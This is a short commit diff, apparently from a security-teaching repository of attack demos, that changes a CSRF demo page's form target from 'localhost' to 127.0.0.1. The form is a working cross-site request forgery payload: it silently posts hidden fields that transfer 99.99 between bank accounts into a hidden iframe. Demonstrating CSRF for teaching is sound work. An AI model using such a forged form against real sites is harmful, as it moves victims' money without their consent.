bug fix: CSRF: changed host from 'localhost' -> 127.0.0.1

--- a/attack-demos/csrf/promotion.html
+++ b/attack-demos/csrf/promotion.html
@@ -23,7 +23,7 @@
 
   <!-- send bank's response to iframe via 'target':
   	https://developer.mozilla.org/en-US/docs/Web/API/HTMLAnchorElement/target -->
-  <form action="http://localhost:5000/transfer" method="POST" target="hiddenFrame">
+  <form action="http://127.0.0.1:5000/transfer" method="POST" target="hiddenFrame">
     <input type="hidden" name="from_account" value="savings">
     <input type="hidden" name="to_account" value="checking">
     <input type="hidden" name="amount" value="99.99"/>
